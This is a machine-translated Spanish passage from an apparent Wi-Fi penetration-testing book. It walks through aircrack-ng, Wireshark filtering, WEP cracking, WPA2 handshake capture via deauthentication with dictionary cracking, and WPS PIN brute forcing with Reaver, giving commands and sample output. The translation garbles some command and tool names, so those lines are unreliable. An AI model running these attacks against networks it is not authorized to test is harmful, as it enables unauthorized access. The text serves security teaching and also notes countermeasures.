UP BROADCAST EJECUTANDO MULTICAST MTU:1500 Métrica:1
Paquetes RX: 37 errores: 0 descartados: 0 desbordamientos: 0 marco: 0
Paquetes TX: 33 errores: 0 descartados: 0 desbordamientos: 0 portador: 0
colisiones: 0 txqueuelen: 1000 RX
bytes: 4437 (4,3 KiB) TX bytes: 3506 (3,4 KiB)
De manera predeterminada, nuestra tarjeta inalámbrica funciona en modo administrado, es decir, solo aceptará el tráfico del punto
de acceso al que está asociada (conectada). Todos los demás paquetes irrelevantes se eliminarán para reducir la carga de
Y para el sniffing Wireless nuestra tarjeta tiene que estar en modo monitor para que pueda recibir tráfico de cualquier red
Airmon-ng
airmon-ng se utiliza para cambiar la tarjeta inalámbrica del modo Administrado al modo Monitor y viceversa.
También se usa para evitar que las pruebas de penetración inalámbricas tengan problemas con las utilidades existentes, como
Simplemente verifique y elimine todos los procesos que podrían causar problemas antes de la prueba de penetración de Wi-Fi.
34
Machine Translated by Google
Airodump-ng
Airodump-ng nos permite
Comencemos airodump-ng
airodump-ng mon0
Este es el comando básico para ejecutar airodump-ng en la interfaz wlan0mon.
Una tarjeta inalámbrica es un tipo de radio; puede funcionar en un canal a la vez. Verás el
número de canal variable en la salida airodump-ng. Se llama multiplexación por división de tiempo.
Investigacion El cliente envía paquetes de solicitudes de sondeo para un punto de acceso (rootsh3ll) al que se conectó previamente,
consulte la línea 13.
35
Machine Translated by Google
Los paquetes de datos también se pueden capturar y guardar en un archivo usando la opción -w con airodump-ng.
Ejemplo:
airodump -ng mon0 -w test_data_capture
ls test_data_capture-01.*
prueba_datos_captura-[Link] test_data_capture-[Link]
prueba_datos_captura-[Link] test_data_capture-[Link]
• Airbase-ng
• Aireplaying
• Airolib-ng
• Aircrack-ng
Conclusión
Aprendimos a instalar aircrack-ng en sistemas Linux y Windows. Poner la tarjeta inalámbrica en modo monitor y
escanear el aire y guardar la información en un archivo para uso futuro. ya que se utilizará en el craqueo WEP y
WPA/WPA2.
36
Machine Translated by Google
Introducción a Wireshark
Wireshark es un analizador de paquetes gratuito y de código abierto. Es una de las herramientas más
potentes y populares que utilizan los pentesters y los administradores de red para
• Análisis de paquetes
En cuanto al análisis, se utiliza para inspeccionar los paquetes que pasan a través de la interfaz de red, que
podría ser su Ethernet, LAN, Wi-Fi, USB (almacenamiento o módem). En otras palabras, Wireshark es un
rastreador de paquetes para los pentesters.
• analizador de red
• Analizador de protocolos
La serie de datos que inspecciona Wireshark se denomina "marcos", que incluye "paquetes".
Wireshark tiene la capacidad de capturar todos los paquetes que pasan por la interfaz de red y decodificarlos
para su análisis.
El marco de datos puede estar encriptado o en texto claro, ejemplo de marco de baliza
Octetos 2 2 6 6 6 2 6 0 - 2312 4
Acrónimo inverso:
FC : Control de fotogramas
D/I: ID de conexión/duración
SC : Control de secuencia
CDN: Verificación de redundancia cíclica
El siguiente extracto de Data and Computer Communications de William Stalling explica estos campos:
Control de tramas: indica el tipo de trama (control, gestión o datos) y proporciona información de
control. La información de control incluye si el marco es hacia o desde un DS, información de
fragmentación e información de privacidad.
37
Machine Translated by Google
identificador
Direcciones: el número y el significado de los campos de dirección de 48 bits dependen del contexto.
La dirección del transmisor y la dirección del receptor son las direcciones MAC de las estaciones unidas al BSS que
El ID del conjunto de servicios (SSID) identifica la LAN inalámbrica a través de la cual se envía una trama.
transmitido. Para un IBSS, el SSID es un número aleatorio generado en el momento en que se forma la red. Para
una LAN inalámbrica que forma parte de una configuración más grande, el SSID identifica el BSS a través del cual se
transmite la trama; específicamente, el SSID es la dirección de nivel MAC del AP para este BSS.
Finalmente, la dirección de origen y la dirección de destino son las direcciones MAC de las estaciones,
destino de este marco. La dirección de origen puede ser idéntica a la dirección del transmisor y la dirección de
Control de secuencia: contiene un subcampo de número de fragmento de 4 bits, que se utiliza para
la fragmentación y el reensamblaje, y un número de secuencia de 12 bits que se utiliza para numerar tramas
Cuerpo de la trama: contiene una MSDU o un fragmento de una MSDU. La MSDU es una unidad de datos de
Es importante tener en cuenta que los administradores de sistemas utilizan Wireshark para verificar si los datos confidenciales se
transmiten de forma segura (cifrados), al mismo tiempo que un pirata informático también puede utilizarlos en redes no seguras (no
cifradas).
Aprenderemos cómo un pirata informático puede hacer mal uso de herramientas legítimas con fines maliciosos una vez que está
conectado a la red.
Antes de pasar al proceso de instalación y tutorial es necesario conocer la historia detrás de la herramienta.
Historia
Wireshark, originalmente llamado Ethereal, fue escrito y lanzado por Gerald Combs, quien se graduó en ciencias de la
computación en la Universidad de Missouri-Kansas City. A fines de la década de 1990, las herramientas comerciales de análisis
de protocolos tenían precios cercanos a los $1500 y tampoco eran compatibles con las principales plataformas de la empresa
(Solaris y Linux). Entonces, Gerald comenzó a escribir Ethereal y lanzó la primera versión en 1998.
En 2006, Combs aceptó un trabajo con tecnologías CACE. Combs no poseía la marca comercial de Ethereal (propiedad de Network
38
Machine Translated by Google
El código fuente de Ethereal, por lo que usó el contenido del repositorio de Ethereal Subversion como base para
el repositorio de Wireshark y luego nombró al proyecto como "Wireshark".
Según Wikipedia,
“Wireshark ha ganado varios premios de la industria a lo largo de los años, incluidos eWeek, InfoWorld,
y Revista PC. También es el rastreador de paquetes mejor calificado en la seguridad de la red [Link].
encuesta de herramientas y fue el proyecto Source Forge del mes en agosto de 2010”.
Desde 2006 en adelante, Wireshark ha estado entre las 10 mejores herramientas utilizadas por los probadores de penetración y los
piratas informáticos.
Wireshark viene preinstalado en la mayoría de las distribuciones de pentesting como Kali Linux, Backbox,
Pentoo, Samurai WTF. Pero siendo un probador de penetración, administrador de red o un niño de secuencias
de comandos, es muy esencial para uno conocer el proceso de instalación de cualquier herramienta y no confiar
en las herramientas preinstaladas y simplemente usarlas.
Las distribuciones de Pentesting están diseñadas para que los pentesters trabajen más rápido, al no tener
que instalar y reparar el sistema cada vez, y también con fines educativos. Pero la gente tiende a malinterpretar
esto con menos trabajo. Puede parecer lo mismo pero no lo es.
Debe aprender a instalar y reparar el software. No solo le brindará una comprensión profunda del
funcionamiento de la herramienta, sino que, al hacerlo, abrirá nuevas posibilidades para que pueda hacer más.
Es como una inversión valiosa que parece pequeña en este momento, pero lo recompensa a largo plazo, más
allá de sus pensamientos y entendimientos.
Instalación y configuración
Wireshark está disponible para Windows, Mac y Linux. Puede descargar Wireshark desde el sitio oficial.
Pero estoy más interesado en enseñar cosas desde cero. Entonces, compilemos Wireshark en Linux desde el
código fuente.
Ejecute el script de configuración . Comprueba su sistema Linux para asegurarse de que tiene las
dependencias de biblioteca adecuadas, además del compilador adecuado para compilar el código fuente. ./
configure --enable-setcap-instalación
39
Machine Translated by Google
Ejecutar Wireshark,
tiburón alambre &
Como sabe, Wireshark puede capturar tráfico de ethernet, USB, Wi-Fi (cuando está autenticado) o Wi-Fi (en modo
monitor).
Puede seleccionar cualquier interfaz (Ethernet, USB o Wi-Fi) y comenzar a capturar tráfico desde ella. Pero,
Teniendo en cuenta el alcance de este libro, tenemos una tarjeta inalámbrica y aún no nos hemos conectado ni hemos penetrado
en ninguna red. Entonces, no nos deja otra opción que olfatear el aire y eso solo es posible poniendo la tarjeta inalámbrica en modo
monitor.
modo monitor
¡Primero lo primero! Elimina los procesos que podrían causar problemas.
airmon-ng comprobar matar
Nombre de PID
3694 wpa_supplicant
3697 dhcliente
3711 avahi-demonio-ch
Para poner la tarjeta en modo monitor, primero busque el nombre de la interfaz inalámbrica.
Escriba iwconfig en la terminal y verifique el nombre de la interfaz inalámbrica, wlan0 en este caso
Escriba ifconfig para verificar la nueva interfaz del modo de monitor. wlan0mon en este caso. el tuyo podría
40
Machine Translated by Google
Tan pronto como habilite el modo de monitor, wlan0mon aparecerá en la lista de interfaces de Wireshark.
También verá una representación gráfica en tiempo real del tráfico recibido por una interfaz.
Haga doble clic en wlan0mon para ingresar a la ventana de visualización en vivo. Paquetes mostrados en tiempo
real con una precisión ordenada de alto nivel. Observe el valor decimal de la columna Tiempo a continuación. si, hasta el 9
¡lugar! Lo que significa que Wireshark mantendrá un orden de paquetes perfecto incluso con dos paquetes con una
diferencia de 1 nanosegundo. ¿Ves el poder? Será mejor que te inclines ante los desarrolladores por esto.
41
Machine Translated by Google
deja de olfatear
Haga clic en el botón rojo en la esquina superior izquierda de la ventana cuando desee detenerse.
una variedad de filtros. Te mostraré algunos de ellos en este segmento para que entiendas cómo funcionan los filtros y hacerte
1. Filtro de pantalla
2. Filtro de captura
Mostrar filtros
Puede aplicar filtros de visualización cuando desee buscar datos específicos. Los paquetes que no coinciden con el filtro de
Una forma de usar los filtros de visualización es comenzar a escribir en el campo de entrada de filtro (barra verde).
42
Machine Translated by Google
Mostrar todo excepto los marcos (![Link].tipo_subtipo == 0x08) && (![Link].tipo_subtipo == 0x1d)
beacon y ack
Puede encontrar una lista completa de los campos de filtro de pantalla 802.11 en la wlan, wlan_mgt, y
wlan_agregate Mostrar referencias de filtro.
Filtros de captura
Cuando utiliza un filtro de captura, solo los paquetes que coinciden con el filtro se vuelcan en un archivo.
Esto reducirá la cantidad de datos a capturar.
Los filtros de captura tienen una sintaxis diferente a la de los filtros de visualización.
Introduzca los filtros de captura en el campo Filtro del cuadro de diálogo Opciones de captura de Wireshark y presione el
botón Inicio.
Los filtros de captura (como el puerto tcp 80) no deben confundirse con los filtros de visualización
(como [Link] == 80). El primero es mucho más limitado y se utiliza para reducir el tamaño de una captura de
paquetes sin formato. Estos últimos se utilizan para ocultar algunos paquetes de la lista de paquetes.
Los filtros de captura se configuran antes de iniciar una captura de paquetes y no se pueden modificar durante la
captura. Los filtros de pantalla, por otro lado, no tienen esta limitación y puede cambiarlos sobre la marcha.
En la ventana principal, uno puede encontrar el filtro de captura justo encima de la lista de interfaces y en el diálogo
de interfaces.
El filtro de visualización se puede cambiar encima de la lista de paquetes como se puede ver en esta imagen:
43
Machine Translated by Google
En la captura de pantalla anterior, hemos ingresado el filtro en el cuadro verde, es decir , 'wlan_mgt.ssid ==
"dlink" '
Todos los paquetes que se muestran tienen un elemento común que es el nombre SSID: dlink que se estaba
transmitiendo al aire. Reemplace dlink con su SSID deseado.
Wireshark captura todo tipo de paquetes y puede pensar en filtrar paquetes con una dirección MAC específica durante el
pentest.
En el siguiente ejemplo, filtraremos todos los paquetes transmitidos por cualquier AP. Los paquetes de difusión tienen una
dirección MAC de destino como "[Link]". Puedes ver esto en la imagen anterior también.
44
Machine Translated by Google
[Link] == [Link] tiene una sintaxis como el lenguaje Java, aquí wlan es el paquete y addr, que es la
dirección del hardware, es la clase definida en el paquete wlan .
Guardar paquetes
Cuando haya filtrado los paquetes deseados, es hora de guardarlos para analizarlos en el futuro.
• Ir a Archivo.
• Haga clic en Guardar.
La próxima vez que inicie Wireshark y desee analizar paquetes guardados previamente
Vaya a Archivo > Abrir. Examine el archivo pcap. Haz lo que quieras.
Codificación de color
Habría notado que todos los cuadros capturados se mostraban en blanco y negro.
Eso no es todo. Wireshark muestra los paquetes en colores.
En los ejemplos anteriores, los paquetes eran paquetes de transmisión y Wireshark no aplica ningún código de color a los
paquetes de transmisión.
De forma predeterminada, el verde es el tráfico TCP, el azul oscuro es el tráfico DNS, el azul claro es el tráfico UDP y
el negro identifica los paquetes TCP con problemas.
Por ejemplo, aplicando un filtro “dns” (Cuando está conectado a Internet) vemos una salida de paquetes, todos resaltados
con color azul oscuro.
Las solicitudes de DNS se propagan a través del puerto 53, como el puerto 21 para FTP, 22 para SSH y 80 para HTTP
Conclusión
Ahora tenemos nuestro Wireshark práctico y pudimos vislumbrar el uso de filtros Wireshark para reducir el desorden.
Aprenderemos más sobre Wireshark y sus filtros a lo largo de la serie.
A continuación, veremos cómo descifrar WEP usando el conjunto de herramientas aircrack-ng e inspeccionar el archivo
pcap capturado usando Wireshark.
45
Machine Translated by Google
WEP usa encriptación de 64 y 128 bits como estándar, pero los investigadores de seguridad descubrieron muchas fallas
en el mecanismo de encriptación de We, como la generación de claves estáticas, el método rápido de regeneración de
claves. Se descubrieron muchas vulnerabilidades y se diseñaron muchos ataques en consecuencia.
Ataques como
Visión de conjunto
WEP se ha descifrado de tantas maneras diferentes que, independientemente del tamaño de cifrado, es decir,
64 bits o 128 bits o 152 bits o la complejidad y la longitud de su clave, su contraseña para el punto de acceso cifrado WEP
está destinada a ser descifrada. Todo lo que se necesita es una cantidad significativa de IV (vectores de inicialización) o,
en términos simples, paquetes de datos que se utilizarán para descifrar el tráfico capturado y recuperar la clave.
WEP está desactualizado ahora, tenemos mejores soluciones para eso. WPA2, enrutadores habilitados para WPS, que
en este momento no están rotos en términos de mecanismo de encriptación. Aunque las claves también se pueden
recuperar en el caso de WPA2 y WPS, eso lo estudiaremos en el próximo capítulo.
podrías estar pensando eso,
• Es fácil de entender cuando empiezas poco a poco. Más grande no será un desastre.
• Todavía encontrará muchos puntos de acceso cercanos que utilizan WEP como esquema de cifrado predeterminado.
Vamos a empezar,
Paso 1:
Conecte su tarjeta inalámbrica y encienda su Terminal Kali e ingrese airmon-ng para verificar que la utilidad airmon-ng
detecte su interfaz inalámbrica.
Usaremos Wlan0, es decir, nuestra tarjeta Alfa, en este tutorial.
46
Machine Translated by Google
Paso 2:
Ejecute airmon-ng check kill en la terminal para todos los programas problemáticos.
Nombre de PID
3694 wpa_supplicant
3697 dhcliente
3711 avahi-demonio-ch
Siempre ejecute airmon-ng check kill antes de poner la tarjeta inalámbrica en modo monitor.
También puede eliminar estos procesos manualmente, lo discutiremos un poco más adelante.
Paso 3:
Ponga la tarjeta Alfa (wlan0) en modo monitor.
La tarjeta Alfa ahora está en modo monitor (wlan0mon), es hora de escanear el aire. Para eso, usaremos
airodump-ng del conjunto de herramientas aircrack-ng.
Paso 4:
Ejecute airodump-ng [interfaz de modo de monitor] e identifique el AP habilitado para WEP.
airodump-ng wlan0mon
CH 1 ][ Transcurrido: 3 s ][ 2017-07-12 22:12
BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID
64: 66: B3: 6E: B0: 8A -42 79 436 455 1 1 54e. WEP WEP OPN rootsh3ll
54: B8: 0A: 8E: 36: 00 -73 0 138 0 0 1 54e WEP WEP abhinav
64: 66: B3: 6E: B0: 8A 2C: 33: 61: 2D: C6: 3G -46 54e-24 0 8 raícesh3ll
[Link] [Link] -60 0 - 1e 0 4 raícesh3ll
rootsh3ll es el ESSID, y las direcciones MAC resaltadas en ROJO son los dispositivos asociados con el enrutador con
MAC [Link]
Después de identificar el AP habilitado para WEP, presione CTRL-C y observe la siguiente información:
47
Machine Translated by Google
Canal (CH): 1
Usaremos esta información según el escenario. También se puede usar para reducir el tamaño del archivo .pcap al
capturar datos de este AP exclusivamente. Esto se puede hacer con airodump ng, fácilmente.
Paso 5:
Especifique el BSSID, el número de canal para airodump-ng para la captura de datos exclusivos y guárdelos en un archivo
para que podamos usar el archivo de volcado para descifrar la frase de contraseña WEP.
BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID
64: 66: B3: 6E: B0: 8A -42 79 9036 1550 1 1 54e. WEP WEP OPN rootsh3ll
54: B8: 0A: 8E: 36: 00 -73 0 138 0 0 1 54e WEP WEP abhinavtsj
64: 66: B3: 6E: B0: 8A 2C: 33: 61: 2D: C6: 3G -46 54e-24 0 832 rootsh3ll
[Link] [Link] -60 0 - 1e 0 834 rootsh3ll
Desglose de comandos:
--bsid: Dirección MAC del punto de acceso
-C: Número de canal operativo de AP, consulte la esquina superior derecha que indica CH. No.
-en: Nombre de archivo de salida, pon el nombre que quieras
Observe la sección #Data de la salida. Estos son los datos (en bytes) capturados del AP
rootsh3ll.
En el caso de los AP base WEP, #Data son los IV que se utilizarán para descifrar la clave.
Recuerde, más paquetes de datos, más fácil de descifrar WEP.
BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID
64: 66: B3: 6E: B0: 8A -62 79 18092 3505 1 1 54e. WEP WEP OPN rootsh3ll
54: B8: 0A: 8E: 36: 00 -73 0 192 0 0 1 54e WEP WEP abhinavtsj
64: 66: B3: 6E: B0: 8A 2C: 33: 61: 2D: C6: 3G -46 54e-24 0 1768 raícesh3ll
[Link] [Link] -60 0 - 1e 0 983 rootsh3ll
Ahora aquí hay una trampa. Observe los paquetes de datos, solo 3505. Para iniciar el proceso de descifrado, debe
tener al menos 5000 IV, ya que la contraseña más fácil de 5 dígitos como 11111, 12345 se puede descifrar con un
número tan bajo. de IVs o paquetes de datos.
Pero eso no es un problema. Airodump-ng se ejecuta sin cesar y seguirá capturando los datos
48
Machine Translated by Google
Paso 6:
aircrack-ng [Link]
Aircrack-ng 1.2 rc4
Afortunadamente, aircrack-ng también se descompone en un proceso interminable, por lo que no es necesario ingresar
Como puede ver en la imagen de arriba, aircrack-ng obtuvo 25ÿ663 IV, pero no tuvo éxito y esperó a que #data se escribiera en el
Después de un significativo no. de los #paquetes de datos son capturados y volcados, aircrack-ng mostrará la contraseña con
un resultado similar
Esta es la forma ideal de descifrar una clave de red habilitada para WEP.
49
Machine Translated by Google
Se le llama ideal porque en cualquier momento no es seguro que un usuario esté descargando, conectando,
navegando o incluso conectado a la red.
¿Y que?
Aquí vienen los ataques descritos anteriormente para llevar los #Datos al límite y conseguirnos los IVs
rápidamente. Aprenderemos sobre ellos más adelante en este libro.
Ahora, a pagar lo que se debía
Una vez que haya terminado con la prueba y desee conectarse a una red, querrá reiniciar el administrador de
red.
Iniciar/Reiniciar administrador de red
1. Abra la terminal 2. Ejecute
service network-manager start 3. Haga lo mismo
con wpa_supplicant y dhclient
Incluso si eliminó los procesos usando el comando airmon-ng check kill , aún puede usar el comando
anterior para iniciar el administrador de red y conectarse a Wi-Fi.
50
Machine Translated by Google
¿Qué es WPA2-PSK?
WPA2-PSK, Wi-Fi Protected Access - Pre-Shared Key, es, con mucho, uno de los algoritmos de cifrado de seguridad
inalámbrica más seguros e ininterrumpidos en este momento. Todavía no hay fallas de encriptación reportadas por los
investigadores de seguridad para WPA2, por lo que un pirata informático malicioso puede aprovechar y desencriptar
fácilmente los paquetes de datos.
El cifrado puede ser el más seguro e ininterrumpido en este momento, pero el sistema WPA2 sigue siendo bastante
vulnerable a los piratas informáticos.
A diferencia de WEP, WPA2 utiliza un protocolo de enlace de 4 vías como proceso de autenticación.
El protocolo de enlace de cuatro vías es fundamental para la protección del PMK de los puntos de acceso maliciosos:
por ejemplo, el SSID de un atacante que se hace pasar por un punto de acceso real, para que el cliente nunca tenga que
decirle al punto de acceso su PMK.
Tanto WPA2-PSK como WPA2-EAP dan como resultado una clave maestra por pares (PMK) conocida tanto por el
solicitante (cliente) como por el autenticador (AP). (En PSK, el PMK se deriva directamente de la contraseña, mientras
que en EAP es el resultado del proceso de autenticación)
El PMK está diseñado para durar toda la sesión y debe exponerse lo menos posible; por lo tanto, es necesario derivar
claves para cifrar el tráfico. Se utiliza un protocolo de enlace de cuatro vías para establecer otra clave denominada clave
transitoria por pares (PTK).
El PTK se genera mediante la concatenación de los siguientes atributos: PMK, AP nonce (ANonce), STA nonce (SNonce),
dirección MAC de AP y dirección MAC de STA.
Luego, el producto se somete a una función pseudoaleatoria. El protocolo de enlace también genera la GTK (Clave temporal
de grupo), que se utiliza para descifrar el tráfico de multidifusión y transmisión.
51
Machine Translated by Google
Los mensajes reales intercambiados durante el protocolo de enlace se muestran en la figura y se explican a
continuación (todos los mensajes se envían como tramas EAPOL-Key):
1. El AP envía un valor nonce a la STA (ANonce). El cliente ahora tiene todos los
atributos para construir el PTK.
Al igual que los paquetes de transmisión que vimos en el capítulo anterior, el protocolo de enlace de 4 vías también está
en texto sin formato.
Lo que permite a un pirata informático potencial capturar la información de texto sin formato como
• Nombre ESSID AP
El pirata informático utiliza la información anterior para realizar un ataque de diccionario en el 4- capturado.
forma de apretón de manos (archivo PCAP). Veamos
52
Machine Translated by Google
Un hash es simplemente una función criptográfica que convierte un dato o archivo de una longitud/tamaño arbitrario a una
longitud fija. A diferencia del cifrado, es prácticamente imposible invertirlo o revertirlo, ya que no interviene ninguna clave en el
proceso.
Los datos cifrados y codificados se pueden descifrar y decodificar respectivamente, pero no existe tal cosa como la eliminación
En un ataque de diccionario,
Los pasos anteriores están involucrados en el proceso de descifrado de frases de contraseña WPA2.
Vamos a empezar,
Paso 1
Iniciar modo monitor
762 wpa_supplicant
Paso 2:
Ahora iniciaremos airodump-ng para olfatear el aire y esperar hasta que el AP deseado y
53
Machine Translated by Google
airodump-ng wlan0mon
CH 13 ][ Transcurrido: 1 min ][ 2017-07-13 01:46
64: 66: B3: 6E: B0: 8A -46 20 1 0 11 54e. WPA2 CCMP PSK rootsh3ll
D8: FE: E3: 7B: 40: A0 -64 15 388 0 1 54e. WPA CCMP PSK Ravi
[Link] -76 9 0 0 1 54e. enlace WPA2 CCMP PSK
54: B8: 0A: 8E: 36: 00 -78 dieciséis 6 0 1 54e WEP WEP abhinav
Como puede ver en la imagen de arriba, “rootsh3ll” es el AP víctima. Ahora vamos a anotar la información
resaltada
AP (ESSID): raícesh3ll
AP MAC (BSSID): 64: 66: B3: 6E: B0: 8A
Cliente MAC: [Link]
Canal: 11
Paso 3:
Inicie airodump-ng, exclusivamente.
BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID
64: 66: B3: 6E: B0: 8A -47 100 119 13 2 11 54e. WPA2 CCMP PSK rootsh3ll
54
Machine Translated by Google
Esperar a que un cliente se conecte puede ser un proceso lento. Ya sea en nuestro caso, la opción 2 es simplemente
perfecta ya que tenemos un cliente conectado al AP inalámbrico "rootsh3ll".
¿Cómo funciona? usamos una herramienta de la suite aircrack-ng, aireplay-ng, que nos permite crear y enviar una solicitud
de desautenticación al AP deseado con la información que anotamos anteriormente.
En realidad, estamos abusando de una función legítima de Windows (o cualquier otro sistema operativo). Lo que obliga a
la tarjeta inalámbrica a volver a conectarse al AP cuando esté disponible.
En la segunda opción, en realidad nos estamos asegurando de que ocurra la opción 1, para que podamos capturar el
apretón de manos.
1. El cliente se desconecta del AP cuando se recibe el paquete de deauth.
2. Vuelva a conectarse al AP (de mayor intensidad de señal)
3. Ocurre un apretón de manos de 4 vías entre el AP y el cliente
4. Hacker (airodump-ng) captura el apretón de manos de 4 vías.
Desglose de comandos:
--muerte 5: 5 solicitudes de deauth transmitidas con BSSID "rootsh3ll", 0 para interminables
-un: Parámetro para decirle a aireplay-ng el BSSID
wlan0mon: Interfaz de modo de monitor
Paso 5:
Captura el apretón de manos
Mientras tanto, en la parte superior derecha de la ventana de salida de airodump-ng, notará algo como:
Apretón de manos WPA: 64: 66: B3: 6E: B0: 8A
BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID
64: 66: B3: 6E: B0: 8A -46 100 357 43 0 11 54e. WPA2 CCMP PSK rootsh3ll
Lo que simplemente significa que el protocolo de enlace WPA se ha capturado para el BSSID específico.
Presiona CTRL-C, ya que el apretón de manos ha sido capturado, ahora descifraremos la contraseña usando el apretón de
manos capturado.
55
Machine Translated by Google
Escriba eapol en el campo de filtro de visualización, presione [ENTER] para aplicar el filtro.
Este es el apretón de manos de 4 vías que ocurrió durante la captura. Es AP y Cliente hablando entre sí. Observe la
pestaña Origen y Destino .
“Una vez que tomas el apretón de manos, tus posibilidades de descifrar la clave son tan buenas como tu lista de palabras”
-Un hacker WiFi legítimo
El descifrado de contraseñas WPA2 no es determinista como WEP, porque se basa en un diccionario de palabras posibles
y no sabemos si la frase de contraseña está en la lista de palabras o no. Asi que,
nunca está seguro de si un diccionario específico funcionaría o no.
Para este tutorial, tengo una lista de palabras bellamente elaborada, en serio, ¡es una obra de arte! solo para demostrar
cómo se vería la salida de la contraseña descifrada.
iamrootsh3ll
Aquí guardé directamente la contraseña en la lista de palabras para demostrar cómo se vería la salida, la tuya sería
diferente, obviamente.
Enciende aircrack-ng y descifra la llave
Sintaxis del comando: aircrack-ng [archivo .cap] -w [ruta/a/lista de palabras], que en nuestro caso se ve así:
56
Machine Translated by Google
Es bastante extraño ver la frase de contraseña descifrada por primera vez, ¿verdad?
Aquí hay una salida de muestra del proceso en ejecución, la suya se vería igual durante el proceso de craqueo.
Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40
Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88
EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86
¿Recuerda el archivo [Link] que creamos al configurar la tarjeta alfa? Haga coincidir su variable psk y la clave
maestra de aircrack-ng . Nos verifica que la clave esté descifrada correctamente, como ya la conocíamos
contramedidas
O simplemente puede mantener una contraseña con algunos caracteres especiales, una palabra que no sea un patrón o
57
Machine Translated by Google
Conclusión
Aprendimos el proceso involucrado en el craqueo de WPA.
Aquí hay una lista de comandos que pasamos por la captura y el proceso de descifrado
58
Machine Translated by Google
Agrietamiento WPS
¿Qué es WPS?
WPS significa Wi-Fi Protected Setup y fue diseñado para simplificar la configuración de un AP seguro para el propietario
promedio. Presentado por primera vez en 2006, en 2011 se descubrió que tenía un grave defecto de diseño. El PIN WPS
podría ser de fuerza bruta en lugar de simplemente usar herramientas como Reaver.
¿Qué es Reaver?
Reaver es una herramienta gratuita de descifrado de WPS de código abierto que explota un agujero de seguridad en
los enrutadores inalámbricos y puede descifrar la contraseña actual del enrutador habilitado para WPS con relativa
facilidad. Viene preinstalado en Kali Linux y se puede instalar en otras distribuciones de Linux a través del código fuente.
Reaver realiza un ataque de fuerza bruta contra el número de pin de configuración protegida Wi-Fi de un punto de acceso.
Una vez que se encuentra el pin WPS, se puede recuperar el WPA PSK
Descripción:
Reaver-wps apunta a la funcionalidad de registro externo exigida por la especificación de configuración protegida
Wi-Fi. Los puntos de acceso proporcionarán a los registradores autenticados su configuración inalámbrica actual
(incluido WPA PSK) y también aceptarán una nueva configuración del registrador.
Reaver-wps realiza un ataque de fuerza bruta contra el AP, intentando todas las combinaciones posibles para
adivinar el número pin de 8 dígitos del AP. Dado que los números de pin son todos numéricos, hay 10^8 (100 000
000-1 = 99 999 999 ) valores posibles para cualquier número de pin dado, considerando que 00 000 000 no es la
clave. Sin embargo, debido a que el último dígito del pin es un valor de suma de verificación que se puede calcular en
función de los 7 dígitos anteriores, ese espacio de claves se reduce a 10 ^ 7 (10,000,000-1 = 9,999,999) valores posibles,
nuevamente como suma de verificación de los primeros 6 ceros será cero, eliminamos 0,000,000 para que sea de fuerza
bruta.
El espacio de la clave se reduce aún más debido a que el protocolo de autenticación WPS corta el pin por la mitad y
valida cada mitad individualmente. Eso significa que hay (10^4)-1, es decir , 9999 valores posibles para la primera mitad
del pin y (10^3)-1, es decir , 999 valores posibles para la segunda mitad del pin, con el último dígito del pin siendo una
suma de control.
Reaver-wps fuerza bruta la primera mitad del pin y luego la segunda mitad del pin, lo que significa que todo el
espacio clave para el número de pin WPS se puede agotar en 10,999 intentos. La velocidad a la que Reaver
puede probar los números pin está completamente limitada por la velocidad a la que el AP puede procesar las
solicitudes de WPS. Algunos AP son lo suficientemente rápidos como para que uno
59
Machine Translated by Google
el pin se puede probar cada segundo; otros son más lentos y solo permiten un pin cada diez segundos.
Estadísticamente, solo tomará la mitad de ese tiempo adivinar el número pin correcto.
Si ha leído el tutorial anterior, sabrá que primero tenemos que poner nuestra tarjeta inalámbrica en modo monitor y luego
comenzar a escanear.
wlan1 es la interfaz inalámbrica en mi caso, puedes verificar la tuya simplemente escribiendo terminal.
iwconfig
Tenga en cuenta la columna "WPS bloqueado"; esto está lejos de ser un indicador definitivo, pero en general, encontrará
que los AP que se enumeran como desbloqueados tienen muchas más probabilidades de ser susceptibles a ataques brutos.
60
Machine Translated by Google
forzando Todavía puede intentar lanzar un ataque contra una red que está bloqueada por WPS, pero las posibilidades de éxito
ESSID/Objetivo: raícesh3ll
BSSID: [Link]
Canal: 11
WPS bloqueado: Sí
lavado -i wlan0mon -C
lavado -i wlan0mon --ignore-fcs
Ambos funcionarán de la misma manera e ignorarán los paquetes FCS y obtendrá el resultado que se muestra anteriormente.
En algunos casos, otro atacante puede ocultar o duplicar el BSSID. En ese caso, Reaver no podrá realizar con éxito un
ataque de PIN WPS. Tendrá que ser más preciso al proporcionar el ESSID y el número de canal, le comentamos
anteriormente a Reaver.
ESSID puede contener espacios, así que siempre incluya ESSID entre comillas.
Esta parte en realidad la realiza Reaver, ya que le hemos proporcionado la información necesaria. Si el enrutador es vulnerable
al ataque WPS Pin, le mostrará una salida como esta:
61
Machine Translated by Google
Si Reaver logra probar un pin tras otro, es probable que el pin WPS y la clave WPA2-PSK
correspondiente se rompan en un par de horas (3-5).
Es bastante gracioso que se suponía que WPS proporcionaría facilidad y seguridad a los usuarios domésticos,
pero un enrutador compatible con WPS vulnerable permite que un atacante potencial rompa la seguridad con facilidad.
No solo la clave WPS, sino también la clave precompartida WPA2 que es considerablemente más difícil
de descifrar sin WPS.
parcialmente compatible
Los siguientes controladores inalámbricos han tenido un éxito mixto y pueden funcionar o no según su
tarjeta inalámbrica (es decir, si tiene problemas con estos controladores/tarjetas, considere probar una
tarjeta nueva antes de enviar un ticket de problema):
• ath5k
• iwlan
• rtl2800usb
• b43
No soportado
Las siguientes tarjetas/controladores inalámbricos han sido probados o se informó que no funcionan correctamente con
Saqueador:
• iwl4965
62
Machine Translated by Google
• RT3070L
• Netgear WG111v3
contramedidas
1. Apague el WPS con el botón WPS, si es vulnerable.
